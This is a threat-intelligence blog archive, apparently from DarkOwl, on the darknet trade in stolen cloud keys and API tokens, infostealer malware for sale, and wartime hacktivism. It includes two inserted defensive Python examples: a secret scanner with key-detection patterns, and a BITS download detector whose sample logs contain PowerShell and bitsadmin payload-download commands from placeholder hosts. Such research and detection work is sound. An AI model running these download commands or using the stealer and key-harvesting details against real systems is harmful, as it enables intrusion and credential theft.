Author: DarkOwl Analyst Team

The Darknet Economy of Credential Data: Keys and Tokens

May 26, 2022

In this blog, we review how sensitive, server-side access credential data – such as AWS private/secret keys, Django secret keys, and API tokens – are captured, circulated, and sold across darknet marketplaces and criminal communities.

Darknet Background

The darknet, which is also referred to as the dark web, is a segment of the internet that is only accessible by using specialized software or network proxies. Due to the inherently anonymous and privacy-centric nature of the darknet, it facilitates a complex ecosystem of cybercrime and illicit trade in goods and services. Adjacent to the darknet are the deep web and instant chat platforms, which play an increasingly critical role in making this illicit information available. Pseudo-anonymous discussion forums and vendor marketplaces hosted on the deep web, along with private and public Telegram channels, provide additional platforms through which threat actors communicate and circulate sensitive and stolen credential data.

There are multiple types of underground criminal communities that are directly involved in the circulation of stolen credential data. The threat actors from these communities are often categorized as:

  1. Initial Access Brokers: specialize in providing direct access to organizational networks to conduct offensive cyber campaigns. Access is offered for sale on darknet malware discussion forums and exploit marketplaces.
  2. Database Brokers: specialize in exfiltration of large datasets from compromised organizations. Databases are traded and sold on darknet marketplaces and Telegram channels.
  3. Nation-State Sponsored / Cyber Criminal Gangs: these groups are intent on conducting cyber operational campaigns in fulfillment of geopolitical or military initiatives, cyber espionage, and/or information operations. Some gangs are also financially motivated and will extort the victim for payment once keys have been leveraged for access and theft of sensitive data.

There is also the odd and less publicized ‘hacker skid’ or hobbyist hackers that will scour the darkest corners of the Internet for server-side credential data for simply the psychological thrill of the hunt. These threat actors do not have direct intent for monetary gain, nor even probable use, but seek to feed their egos and increase their personal clout by stealing keys and communicating their various levels of illegal access to high-profile criminal groups and hacking enthusiast communities and chat servers.

Critical Credential Data

This blog is focused on server-side credential data for development and cloud-based server assets. The term credential data is also used for username/email address and password combinations, which are not discussed here.

There are several types of “keys” that threat actors are interested in obtaining:

  • Amazon Web Services (AWS) Key Management Service (AWS KMS) access keys: ‘poweruser’ and administrator encryption keys for managing Amazon-hosted services.
  • AWS Identity and Access Management (IAM) keys: long-term credentials that users use to sign programmatic requests to the AWS Command Line Interface (CLI) or the AWS API.
  • Azure keys and secrets: credential data stored inside Azure Key Vault (KV), including database connection strings, account keys, passwords, and JSON Web Keys.
  • Django SECRET_KEYs: the secret key of a particular Django installation, used to provide cryptographic signing.
  • Google Key Management System (KMS) Customer Managed Encryption Keys (CMEK): project IDs and private keys for service accounts on the Google Cloud Platform (GCP).
  • API keys: keys required for any number of application programming interfaces.

Unfortunately, the threat actors do not always delineate types of keys they’ve obtained or are offering. Many times the threat actor simply advertises the platform and the word “key” in the forum post or marketplace advertisement.

Key Compromise

Commercial application developers have been guilty of copying and pasting keys into organizational GitHub repositories that are publicly accessible and easily harvested by automated web scrapers. Malicious threat actors actively hunt for such keys across software repositories and unprotected S3 buckets, then use the keys for malicious campaigns or trade them on the darknet. Sometimes such exfiltrated data is staged on transient paste sites prior to distribution, which is where DarkOwl captures it.
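To make the leak path above concrete from the defender's side, here is an added example (not DarkOwl's code or any project's): a small pre-commit style scanner that flags AWS access key IDs, AWS secret keys and Django SECRET_KEY assignments before they reach a repository, so that the scrapers described above never get a chance to find them. The sample file content, the rule names and the 3.5-bit entropy threshold are assumptions; the AWS values are the public placeholder keys from AWS documentation.

```python
"""Added example, not DarkOwl's code: a minimal secret scanner of the kind a
defender runs as a pre-commit hook or CI step. Sample content is constructed;
the AWS values are the placeholder keys from AWS documentation."""
import math
import re
from collections import Counter
from typing import Dict, List

# Detection rules (assumed names). Long-term IAM access key IDs start with AKIA
# (temporary STS ones with ASIA) followed by 16 uppercase alphanumerics. The
# matching secret and a Django SECRET_KEY have no fixed prefix, so those rules
# match the assignment and rely on an entropy check to drop obvious placeholders.
RULES = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b"),
    "aws_secret_access_key": re.compile(
        r"(?i)aws_secret_access_key\s*[=:]\s*['\"]?([A-Za-z0-9/+=]{40})"),
    "django_secret_key": re.compile(r"SECRET_KEY\s*=\s*['\"]([^'\"]{20,})['\"]"),
}
PREFIXED = {"aws_access_key_id"}  # structural match; no entropy check needed


def shannon_entropy(s: str) -> float:
    """Bits per character: generated secrets score well above 4, words below 3.5."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_text(text: str, path: str = "<stdin>", min_entropy: float = 3.5) -> List[Dict[str, object]]:
    """Return one finding per matched secret, with the value redacted for the report."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RULES.items():
            for m in pattern.finditer(line):
                value = m.group(1) if m.groups() else m.group(0)
                if rule not in PREFIXED and shannon_entropy(value) < min_entropy:
                    continue  # "changeme..." style placeholder, not a real secret
                findings.append({
                    "path": path, "line": lineno, "rule": rule,
                    "entropy": round(shannon_entropy(value), 2),
                    "redacted": value[:4] + "..." + value[-4:],
                })
    return findings


# Constructed sample: a settings file about to be committed.
SAMPLE = """\
# constructed: a settings file about to be committed
DEBUG = False
SECRET_KEY = "changeme-changeme-changeme"
SECRET_KEY = "x7$k2!p9q@r4w#v1z&b5m^n8c*d3f(g6h)j0"
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
"""

if __name__ == "__main__":
    hits = scan_text(SAMPLE, "settings.py")
    for h in hits:
        print(f'{h["path"]}:{h["line"]} {h["rule"]} {h["redacted"]} (H={h["entropy"]})')
    raise SystemExit(1 if hits else 0)  # a non-zero exit blocks the commit in a hook
```

The entropy gate is what keeps such a scanner usable: the placeholder on line 3 of the sample is dropped, while the generated key on line 4 and both AWS values are reported with the secret itself redacted, so the report can be shared without re-leaking the key.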

A recent example of a ‘dump’ of secret server keys is demonstrated in the figure below. These were discovered by simply using DarkOwl’s proximity search to find documents where the words ‘AWS’ and ‘key’ are within two words of each other.

Figure 1: Source DarkOwl Vision

Some threat actors offer zero-days on malware-centric Telegram channels and darknet discussion forums that facilitate the scanning of Gitlab and Github. In early 2021, a user on AIO Crime, using the moniker soapceo, offered a 0day for searching private repositories for AWS keys for $10K USD.

Figure 2: Source DarkOwl Vision

Other malicious actors employ malware, such as information stealers (a.k.a. infostealers) to steal session tokens and keys. Infostealers such as Redline, Jester, and Eternity – often installed onto victim devices via malicious email campaigns – covertly log and exfiltrate sensitive data from the victim’s device to cause additional harm.

According to open sources, information security researchers have identified similar information stealer malware in the wild, such as TeamTNT_AWS_Stealer, that specifically targets virtual/cloud platforms to exfiltrate sensitive AWS keys on Kubernetes and Docker clusters adjacent to the compromised container.

DarkOwl identified malware called Laravel Monster that is advertised as an “all-in-one grabber” that exfiltrates AWS keys “and more” offered on a popular Russian-speaking forum. The malware also includes a built-in AWS checker that validates whether the keys harvested are active and live and could be used to compromise the server.

Figure 3: Source DarkOwl Vision

For reference, in early 2022 we observed another example, a “Git Scanner” tool offered on an exploit forum for $4K USD to $8K USD depending on the features of the software. A YouTube video demonstrating the software is also included in the post.

In April 2022, a user posted an offer on Telegram for something called, “INJECTOR V3” and a hacking guide known as “Amazon AWS SMTP Method 2022.”

It’s unclear what the details of this method entail (as we did not purchase it); however, other chatter on Telegram suggests it “cracks” AWS servers, uses the server to carry out malspam email campaigns, e.g. phishing, and may even harvest data while on the server.

Figure 4: Source DarkOwl Vision

Keys on Offer

DarkOwl has observed sensitive credential data and keys on offer across the darknet and adjacent chat platforms known for facilitating cybercrime. Darknet and deep web forums popular for discussing critical credential data such as keys include many of the malware-specific forums, such as XSS. Many times the mention relates to “how to exploit” what they have discovered on the compromised cloud asset, while other keys are offered “for sale” in the ACCESS section of the marketplace embedded in the forum.

Darknet threat actors utilize Jabber XMPP and Telegram services in conjunction with their accounts on malware discussion forums to communicate directly with their customers and/or provide more detail about their use of malware they’ve developed or are on offer.

Some threat actors have dedicated “public” Telegram channels where services and digital goods are offered for sale. DarkOwl has observed keys for sale on darknet forum threads and Telegram channels. Many offers on Telegram include offers for keys to simply increase their credibility in the space and encourage customers to do business with them.

Figure 5: Source DarkOwl Vision

While many keys are captured via the methods mentioned above, sensitive SDK API keys are often stolen during organizational cybersecurity incidents and then circulated by groups on the darknet and in Telegram channels. In the summer of 2021, Electronic Arts (EA)’s FIFA software servers were compromised by a cybercriminal gang, and the data is still in circulation.

Figure 6: Source DarkOwl Vision

Sometimes a discovered or stolen key is utilized to access a cloud or platform panel and the threat actor offers the ‘panel’ for sale. In late 2021, a Telegram market, known as “The Grand Exchange” advertised an Azure panel on offer for sale. The advertisement references a deep web marketplace for the vendor.

Figure 7: Source DarkOwl Vision

Many API keys in circulation on the darknet are offered for free. DarkOwl has observed several recent software API keys offered for free on popular commercial-accounts-trading Telegram channels.

In 2020, a Telegram channel user stated they had a Binance API key obtained via information stealer malware.

In March 2021, an initial access broker advertised sensitive credential data and cloud-access AWS “root” keys for a US company on a popular darknet malware development forum. The keys were on sale for $80K USD, and the threat actor included the company’s revenue estimates and AWS bills to justify the price of the keys relative to the potential ransomware extortion value.

Figure 8: Source DarkOwl Vision

DarkOwl has observed API keys for sale on darknet discussion forums and adjacent Telegram live chat platforms. Both Raidforums and its newest reincarnation, Breached Forums, have included such offers on their sites. The figure below is an example of a Raidforums user on Telegram offering to sell a Coinbase Pro API key for malicious access. How the API key was obtained is unclear.

Figure 9: Source DarkOwl Vision

DarkOwl has observed threat actors offering to sell access to “logs” on darknet marketplaces such as Russian and Genesis. Such logs are obtained via stealer malware variants and include session tokens and keys taken from victim devices.

Databases of stealer logs that may include API tokens and sessions are also offered for sale and trade on deep web forums such as Breached Forums.

Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.


Pardon Me While I Steal Your Cookies – A Review of Infostealers Sold on the Darknet

May 19, 2022

Overview: Information Stealers (or ‘infostealers’)

In recent months, DarkOwl has observed an increase in the number of posts advertising a specific type of malware known as “information stealers” or simply, ‘infostealers’ by the underground cybercriminal community. Most of the infostealer promotion appears on darknet and deep web malware/hacking forums and are available for sale across many darknet marketplaces.

Information stealers are designed to steal sensitive information from a compromised device. Most information stealers are designed to covertly access the application where data is stored, e.g. the internet browser, gather personal information such as authentication and credential data, crypto wallets, browser session cookies, etc., and remotely transmit the data back to the cybercriminal for conducting additional financially-focused extortion crime.

Infostealers are commonly delivered by social engineering, such as malspam campaigns and phishing emails. Attachments are typically included in the email with a lure, or a legitimate-looking trap encouraging victims to open the attachment and install the malware onto their device. Information stealers are on the rise and promise lucrative business opportunities for cyber criminals.

In this research, our team reviewed some of the most widely proliferated infostealers on offer on the darknet and discovered an elaborate data exfiltration ecosystem, with low-entry cost, providing cybercriminals access to a wealth of personal information without the victim’s knowledge. We also learned many infostealers are offered in alignment with a malware-as-a-service (MaaS) or “stealer-as-a-service” (SaaS) rental model with subscriptions-based access to the malware executables and associated command and control C2 botnets. 

Redline

Redline is one of the most popular, widely recommended, and notorious information stealers available on the market. The first advertisement for Redline appeared in March 2020. Redline can be used for exfiltrating credentials, cryptocurrency wallets, browser information, as well as FTP client application data. The stealer also collects information about the victim device, including OS, system hardware, processes, and system language.

According to OSINT security researchers, the stealer can load remote payloads in addition to using the SOAP protocol for covert C2 communication. Recent versions of Redline use SOAP (Simple Object Access Protocol) over NET.TCP, which helps obfuscate the communication between the victim and the C2 servers. SOAP also allows smaller packet sizes, which translates to a smaller malware footprint.

Redline is available on darknet marketplaces like DarkFox for as little as $150 USD for the “lite” version, $200 USD for an advertised “pro” version, or $100 USD for a monthly subscription with restricted access. Other marketplace offers indicate that the Redline team advertises various versions and configurations of its infostealer to suit varying levels of threat actor sophistication.

The malware is written in C# and uses a SOAP API to communicate with its C2. Attackers are contacted on Telegram and then can use the C2 panel installed on the victims’ device to use Redline. Redline source code is available on Github with 142 lines of code and built-in commands. (Source: Available Upon Request)

Figure 1: Offer for Redline Stealer for sale on Darkfox Darknet Marketplace

Raccoon

According to open sources, Raccoon Stealer, a.k.a. Racelar, was first offered for sale in April 2019 and is associated with the Telegram user @gr33nl1ght. The Raccoon stealer exfiltrates victim login credentials, credit card information, cryptocurrency wallets and browser information. It can also download and execute arbitrary files on command from the C2, which is operated from Telegram.

DarkOwl has observed advertisements in the darknet for Raccoon offered under the malware-as-a-service model for $75 USD a week or $200 USD per month. Some advertisements on Telegram decrease with longer commitment, e.g. $500 for two months and $499 for four months. The Raccoon stealer executables are available on Github and the source code has been archived in Pastebin.

Despite the success of their operations, in March the Raccoon stealer group announced on a darknet forum that they would be suspending operations due to the war in Ukraine and because critical team members were no longer available for key operations.

Figure 2: Raccoonstealer Representative Announcement of Shutdown due to Ukraine-Russia War

Vidar

According to analysts with Cyble, Vidar, also sold as Vidar PRO stealer, was first identified back in 2018. This infostealer variant steals sensitive information such as passwords, banking information, IP addresses, browser history, login credentials and crypto wallets which are sent back to threat actors’ command and control.

The stealer is widely advertised on Telegram and a DarkOwl Vision document captures a Vidar offer on Telegram for $500 USD, but prices on average range from $250 USD to $750 USD for the stealer malware. (Source: DarkOwl Vision)

Vidar is written in C++ and employs Mastodon servers for command and control. An interesting and in-depth analysis of the stealer code on Github details how its stealer infrastructure operates. (Source Redacted but Available Upon Request)

Predator the Thief

Predator the Thief was first offered for sale on a Russian Darknet Forum on June 17, 2018 by a user known as Alexuiop1337. Predator the Thief is more comprehensive than a browser stealer alone and is able to take screenshots of the victim’s desktop in addition to typical exfiltration of credentials, payment data, crypto wallet information stored in the victim’s internet browsers. (Source)

The malware also includes anti-debug techniques, advanced evasion, and anti-analysis tricks for additional sophistication. It is still widely circulated and updated regularly. A Github repository containing the infostealer’s 332 lines of code is still maintained by a user with the same alias as the original post from 2018. (Source Redacted, but Available Upon Request)

The listing is currently offered on darknet forums as well as Telegram channels. The stealer sells for $150 USD, with an option of paying $100 more for the Clipper module allowing buyers to customize crypto wallet stealing options.

Mars

Mars stealer is the most recent version of OSKI stealer and was first seen circulating around July 2021 on a Russian darknet forum. (Source)

During our analysis, we also discovered that instructions for building the Mars stealer panel and using the “builder” are available across numerous darknet forums, including how to turn off the exclusion that stops the stealer from running in Commonwealth of Independent States (CIS) designated countries. This infostealer is advertised for $160 to $200 USD and is continually under development and improvement, complicating YARA rule creation and AV detection.

In early May, users on a darknet forum began circulating a cracked version of the software for use by the community. Many of the forum users warn against using ‘cracked’ versions of the software as there is higher risk of backdoors. We observed that a prominent MarsTeam account which shared some of the original advertisements for the Mars stealer on one popular darknet forum is banned and tagged as a scammer. The ban brings into question the stealer’s legitimacy.

Figure 3: Original post about the Mars Stealer whose Representative has since been banned

Regardless, a GitHub repository containing code for the Mars Stealer is owned by a developer with an impressive collection of various malicious software and other stealers in their repositories, including Loki and Oski stealer as well as Redline. The current version of Mars stealer is using Google Ads to put cloned OpenOffice sites high on search results.

Blackguard

According to open sources, Blackguard first appeared on Russian forums in January 2020 and was advertised “for testing purposes.” The infostealer spent a year in circulation before it was advertised for commercial use in 2021. Blackguard steals web browser data such as extensions, cryptocurrency wallets, email, messengers, and other sensitive device information that can identify the victim.

Blackguard is sold as malware-as-a-service; stolen information is archived into a zip file which is sent back to the C2 server. The source code is developed in .NET, and access is available for $200 USD a month or $700 for a lifetime subscription. (Source)

Acquisition of the stealer is generally limited to direct exchange with the malware’s representatives via Telegram and Jabber.

Despite its popularity among cybercriminals and the existence of a cracked version recently in circulation, some dark web forum users are not impressed with this information stealer or its price tag. Some users recently nominated the Blackguard stealer for the “worst stealer 2020-2022 award” and warn others against using this stealer for live malicious cyber campaigns.

Figure 4: Forum post criticizing Blackguard stealer malware
[Figure Translated]
“The sold software, which is a shame to call a stealer, has already been said a lot. He can officially be nominated for the “Worst Stealer 2020-2022” award Crack taken from the forum where the initial review was posted. It is worth noting that this crack is given “as is”, without fixing holes in the panel. It is categorically not recommended to use it for combat purposes. There is also information that the stealer was so buggy that it fell with exceptions during the crack tests (for example, when getting the av name installed on the machine). These bugs have been fixed by the reverser!”

In other darknet threads, forum users stated that the Blackguard information stealer is “trash”, replete with errors, and requires too much overhead – in the form of persons to operate, especially for the $700 USD price.

Figure 5: Forum post criticizing Blackguard’s lifetime subscription prices
[FIGURE TRANSLATED]
“AHAHAHAHAHAHAHAHAH, $700 sounds more like a rofl than the real price…” That all in all sounds like a big rofl. The author of this software supports the AUE culture and listens to Nurminsky. And now, comrades, answer me one question: how did we come to this. AUE coder. It is 2022. Is this what we deserve?”

The criticisms caused quite a controversy with the stealer representative on the forum confronting many users directly and suggesting they take it up with the moderators in Arbitration.

Jester

Jester is an information stealer that Cyble first noticed in darknet forums in July 2021. It targets the victim’s browser cookies, credentials, email clients, instant messaging applications, crypto wallets, gaming software, VPN and FTP client application data. (Source)

Advertisements on a darknet forum state that the stealer-to-C2 connection is encrypted using AES-CBC-256, that the servers are located in the Tor network, that all logs are redirected to the user’s Telegram bot, and that collection occurs in memory instead of on disk to evade detection. Jester is available on RuTor with links to pastebin sites explaining, in different languages, what the stealer does and how much it costs. The “Builder Jester” malware-as-a-service offering is priced by length of subscription: $99 USD per month, and two “forever” options at $250 USD and $999 USD.

Cyble suggested a Github owned by user L1ghtM4n linked to the Jester malware, but further investigation shows that user is linked to a repository called DynamicStealer. DarkOwl has not been able to confirm if the two malware source codes are affiliated; however, some very recent reporting suggests that Jester might be affiliated with the Eternity malware family.

Users promoting Eternity deny the connection, but flaunt that Eternity offers not only a cookie stealer, but a cryptocurrency malware variant, a cryptocurrency address clipboard “clipper”, a DDoS botnet, Worm and Dropper system, as well as a ransomware variant. A new Eternity stealer Tor service claims they successfully exfiltrate a considerable amount of information from the victim including Signal contacts and password manager data on the device like LastPass. 

Figure 6: Eternity stealer promotional information provided by the threat actor

Taurus

Taurus Stealer, also referred to as Taurus Project, is an information stealer that was observed being promoted by the authors of Predator the Thief on Russian chat forums in early April 2020. It can steal VPN and social media credentials, cookies, autofill forms, popular cryptocurrency wallets, and the history of Chromium- and Gecko-based browsers. It collects information on installed software and system configuration and sends it back to the attacker to be used for further exploitation of the compromised machine.

Like Mars Stealer, the code will not execute on victims located in the CIS region, suggesting the authors are likely located in the Russian Federation.

A lifetime license to Taurus is available for $100 USD and can be customized for as little as $20 USD extra. One advertisement we observed on Telegram offered a 10% discount on license cost and the first update is available for free.

Both Taurus and Predator the Thief use BitsTransfer in their PowerShell commands. BITS is short for “Background Intelligent Transfer Service”, a component of Windows that lets programs ask the operating system to download or upload files from a remote HTTP or SMB file server in the background.

Taurus uses it to download from malicious GitHub repositories, whereas Predator the Thief’s PowerShell works with LNK files after the stealer has sent the log. When BitsTransfer is executed in Taurus, it downloads three separate files from the Taurus Project repository on Github owned by andrewwilm. Github has since removed the repository.
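As an added defender-side example (not from the DarkOwl post or either stealer’s code), the following script hunts for BITS-driven downloads in process-creation telemetry, which is where the BitsTransfer commands described above become visible: the stealer still has to launch PowerShell or bitsadmin with a source location. The log format, hostnames, the placeholder source locations and the patch-server allowlist are all constructed assumptions.

```python
"""Added example, not from the DarkOwl post: detecting BITS-based downloads in
process-creation telemetry. Log lines are constructed stand-ins for Sysmon
Event ID 1 / Windows 4688 command-line fields; hosts and allowlist are assumed."""
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import urlparse

# Indicators of BITS being driven from a command line.
BITS_INDICATORS = [
    re.compile(r"(?i)\bStart-BitsTransfer\b"),
    re.compile(r"(?i)\bImport-Module\s+BitsTransfer\b"),
    re.compile(r"(?i)\bbitsadmin(?:\.exe)?\b.*?/transfer\b"),
]
URL_RE = re.compile(r"(?i)\bhttps?://\S+")          # remote HTTP(S) source
UNC_RE = re.compile(r"\\\\[A-Za-z0-9_.-]+\\\S+")   # remote SMB source (\\server\share\file)
ALLOWED_HOSTS = frozenset({"update.corp.example"})  # assumed internal patch-server allowlist

LOG_RE = re.compile(r'^ts=(\S+) host=(\S+) user=(\S+) image=(\S+) cmdline="(.*)"$')

# Constructed telemetry: one malicious HTTPS fetch, one routine patch download,
# one bitsadmin SMB fetch, one unrelated process, one BITS call with no literal source.
SAMPLE_LOGS = [
    r'ts=2022-05-10T09:12:03Z host=WS01 user=CORP\alice image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -c Import-Module BitsTransfer; Start-BitsTransfer -Source https://files.example-placeholder.invalid/p.bin -Destination C:\Users\Public\p.bin"',
    r'ts=2022-05-10T09:15:41Z host=SRV02 user=SYSTEM image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -c Start-BitsTransfer -Source https://update.corp.example/patch.msi -Destination C:\Windows\Temp\patch.msi"',
    r'ts=2022-05-10T09:20:17Z host=WS03 user=CORP\bob image=C:\Windows\System32\bitsadmin.exe cmdline="bitsadmin /transfer job1 \\10.0.0.5\share\tool.exe C:\Users\bob\tool.exe"',
    r'ts=2022-05-10T09:22:05Z host=WS01 user=CORP\alice image=C:\Windows\notepad.exe cmdline="notepad.exe notes.txt"',
    r'ts=2022-05-10T09:30:59Z host=WS04 user=CORP\carol image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -c Start-BitsTransfer -Source $src -Destination $dst"',
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one log line into its fields; None if it does not fit the assumed format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts, host, user, image, cmdline = m.groups()
    return {"ts": ts, "host": host, "user": user, "image": image, "cmdline": cmdline}


def source_host(src: str) -> str:
    """Host part of an http(s) URL or a UNC path, lower-cased for allowlist comparison."""
    if src.lower().startswith(("http://", "https://")):
        return (urlparse(src).hostname or "").lower()
    return src.lstrip("\\").split("\\", 1)[0].lower()


def detect_bits(lines: Iterable[str], allowed_hosts=ALLOWED_HOSTS) -> List[Dict[str, object]]:
    """Alert on BITS usage whose source is not an allowlisted host (or has no literal source)."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or not any(p.search(ev["cmdline"]) for p in BITS_INDICATORS):
            continue
        sources = URL_RE.findall(ev["cmdline"]) + UNC_RE.findall(ev["cmdline"])
        external = [s for s in sources if source_host(s) not in allowed_hosts]
        if sources and not external:
            continue  # every source is an allowlisted patch server: routine, not alerted
        alerts.append({
            "ts": ev["ts"], "host": ev["host"], "user": ev["user"],
            # medium: BITS invoked with no literal source (variable or encoded), needs review
            "severity": "high" if external else "medium",
            "sources": external,
            "cmdline": ev["cmdline"],
        })
    return alerts


if __name__ == "__main__":
    for a in detect_bits(SAMPLE_LOGS):
        print(f'{a["ts"]} {a["severity"]:6} {a["host"]} {a["user"]} sources={a["sources"]}')
```

Allowlisting the source host rather than the command keeps legitimate patching quiet, while a BITS transfer whose source is hidden behind a variable still surfaces at medium severity for analyst review.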

In late December, the source for Taurus stealer + its builder, were leaked on a popular darknet forum. Earlier this week, a darknet user offered multiple software iterations of both Predator the Thief and Taurus for $4K USD in Monero cryptocurrency – stating the code was “straight from the author’s hands.” This implies that both Predator the Thief and Taurus stealers were most likely coded originally by the same person.

Figure 7: Offer of source code for sale for Predator the Thief and Taurus stealer software
[Figure Translated]
“The original source code of the two projects.
Predator: 3 versions (2.3.1/3.0.1/3.3.4 ) + clipper model. The panel is not included.
Taurus 4 versions (1.2/1.3/1.4/1.5). Included panel (frontend vue.js, backend golang), telegram bot builder (golang).
Projects are sold as is, without support and updates. Straight from the author’s hands.
The price for all 4k is $XMR only. We can conduct the transaction through the guarantor of this forum.”

Other Information Stealers

While the stealers mentioned above are the most widely circulated and discussed across the information security community and cybercriminals, we also found other less known stealers that are currently active in the underground.

Ginzo

In late April, we found an “as-is” version of source code for a stealer known as “Ginzo” available to download from a popular third-party anonymous data repository. The Ginzo stealer targets Telegram session data when loaded on a victim’s device, along with Internet browser cookie data, desktop files, cryptocurrency wallet data, and Discord tokens.

Open-source reporting suggests that offering the stealer for free to download is a ploy to gain reputation and “get criminals hooked” on using Ginzo’s threat actors command and control servers.

[TRANSLATION]
“Taken in the vastness of the cart, laid out as is. DLL keys that are thrown with the panel have not been checked.”
Figure 8: Source code for Ginzo stealer offered for download

Grim

Another controversial stealer, called “Grim stealer” hosts its own deep web vendor shop and market offering their stealer for sale. The site claims there is a Telegram scammer which is causing the controversy on darknet forums as they are using the malware team’s logo and pulling a classic case of ‘alias hijacking’ to discredit the stealer’s reputation.

Like Eternity, the Grim shop offers their Grim Noid stealer for $110 USD as well as other products such as: a stealer builder for $60 USD, cryptocurrency clipboard “clipper” for $50 USD, a remote access trojan (RAT) for $100 USD, and botnets for the Surface Web and Telegram for $300 USD.

The technical specifications advertised are consistent with other infostealers on the market.

Figure 9: Grim Noid Stealer offered for sale

The market for information stealers is booming on the darknet, with stealer software variants readily available offering high volume data exfiltration, a relatively low-entry cost, and reliable C2 botnet support.

All the stealer families we reviewed advertise a supportive criminal ecosystem, providing cybercriminals steady access to a wealth of digital tokens and personal information that can be abused for subsequent fraud, digital identity theft, and potentially catastrophic critical infrastructure and supply chain attacks.

Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use-case.

Ukraine’s Call for Help Results in Global Cyberwar: Reviewing the Fallout

May 13, 2022

On the 24th of February, after months of failed diplomacy, the existing geopolitical landscape of Russia, Ukraine, NATO, the EU, China, and the myriad of complex international relationships changed drastically. Thousands of Russian troops and equipment crossed into Ukraine’s sovereign territory, and missile strikes on critical infrastructure and historical landmarks sent its people deep into bunkers underneath the cities, while others took up arms to defend their country.

While the kinetic war waged in the physical realm, Ukraine’s Ministry of Digital Transformation turned to the digital realm for assistance. Within days of the invasion, a call went out across underground forums and chatrooms, and hundreds of thousands of volunteers – many of whom identify with the Anonymous hacktivist collective – answered.

Ukraine’s call for help sparked off the first ever global cyberwar.

Weeks before tanks and soldiers marched on the cities of Ukraine, Russia had already carried out a series of successful cyberattacks against Ukraine, hitting critical infrastructure and financial institutions around the country with at least six unique strains of destructive wiper malware. DarkOwl observed data exfiltrated during some of those attacks surface in the darknet, such as the Free Civilian service on Tor where hundreds of gigabytes of Ukrainian citizens’ sensitive personal data appeared. Recent reporting confirms Russia’s GRU also carried out a massive cyberattack against Viasat, knocking its customers’ KA-SAT satellite broadband offline an hour before the invasion.

Russia’s pre-invasion attacks against Ukraine pale in comparison to the retaliative cyberattacks launched against Russia by the international hacktivist community over the last 77 days. Since the invasion began, thousands of hacktivists, cybersecurity researchers, pen-testers, and ‘greyhats’ are actively participating in daily campaigns to disrupt Russia’s military offensive and influence the perceptions of the Russian people trapped behind the walls of the iron curtain.

Cyber Warriors Use Their Keyboards and Phones as Weapons in Global Cyberwar

Ukraine’s Ministry of Digital Transformation has played a large role in mobilizing calls to arms from a digital perspective. The IT Army of Ukraine – a digital army of over 275,000 volunteers that was tasked by The Ministry – targets Russian websites every day for widespread distributed denial of service (DDoS) attacks. The Ministry also coordinated directly with SpaceX on acquiring thousands of Starlink terminals for redundant satellite Internet access and spearheaded public calls to international business leaders and retail suppliers to withdraw from operating in Russia.

Hacktivist cyber cells aligned with the Anonymous collective and pro-Ukrainian criminal cyber threat actors conducted hundreds of direct information operations campaigns against Russia using any and every exploit in their arsenal. To this day, the attacks continue relentlessly despite Russia’s attempts to use geo-fencing and Cloudflare services.

Within the first week of the war, we witnessed credentials for numerous critical Russian government ministries leaked on the deep web; the names, phone numbers and personal assets of Russian oligarchy released to the public; names, passports, and dates of birth for over 120,000 Russian soldiers deployed in Ukraine; internal documentation for Russia’s Police Force, Ministries of Foreign Affairs, and Economy leaked.

Darknet criminal communities split over their national alliances. Pro-Russian ransomware groups watched their affiliates abandon their programs and turn on them. We witnessed multiple groups have the internal documentation, source code, and private chats leaked. Several Tor forums and vendor markets hosted in Russia faced persecution through direct cyberattacks, database leaks, and deanonymization of IP addresses.

Propaganda as a Weapon

In any cyberwar, information is power. Knowing that Moscow would try to frame the war as a justified and defensive strategic military operation, Anonymous worked immediately to identify facts and combat misinformation. Videos of the attacks against civilian buildings went viral on social media, YouTube, and Discord. Russian television, radio, and streaming services were illegally accessed to share images from Ukraine. Anonymous security specialists from Poland known simply as squad303 spun up their 1920.in service – named after a famous RAF squadron involved in WW2’s Battle of Britain – which allowed strangers to contact a random Russian citizen via SMS, email, WhatsApp, and Viber using leaked lists of millions of Russian citizens’ personal contact information and social media.

As of the first week in May, the squad303 team announced that over 100 million direct messages had been sent using their service.

Figure 1: Screenshot of squad303’s Russian Citizen Phone Number Contact Service

The Kremlin responded by tightening their control on the public media narrative, shutting down social media platforms like Twitter, Instagram, and Facebook, officially calling their war a “special military operation” and using militarized riot police to enforce a strict ban on all forms of public protest of the invasion.

Western media and independent news sources have been threatened with journalists facing a potential 15-year prison sentence for reporting anything that countered Putin’s narrative of “denazification of Ukraine” and “freeing” its people from imminent nuclear threat from the US and NATO. Russian propaganda outlets began recirculating false claims of US-sponsored bioweapon laboratories and nuclear weapon storage facilities across Ukraine to justify the invasion.

Since the invasion, the Russian Internet Research Agency (IRA)-backed ‘troll army’ is in full force with thousands of bot accounts active across Twitter, Facebook, Discord, and Telegram spinning a different story on the ground in Ukraine. The accounts disseminate elaborate storylines of Ukraine shelling their own citizens and supporting fake videos and doctored media.

QAnon and Russian Disinformation

Deep web and darknet imageboards (or “chans”), historically supportive of the QAnon movement and home of the most outrageous conspiracy theories ever told, have also been supportive of Putin touting his critical international role – like that of former President Trump’s – in ridding the world of its secret Cabal and the greedy desires of the New World Order.

According to research shared by Bellingcat, posts on the imageboards in early March stated Russia capturing Ukraine’s Chernobyl plant was critical to stopping everything “from DNA experiments, adrenochrome, torture, childsex and rape facilities, cloning installations and much more.” Ironically, QAnon Russia – with one of the largest QAnon follower bases at over 90,000 users – has a dissenting opinion and refuses to share the propaganda, instead promoting peace in Ukraine and a united brotherhood across all nations in the region, including Belarus, Russia, and Ukraine.

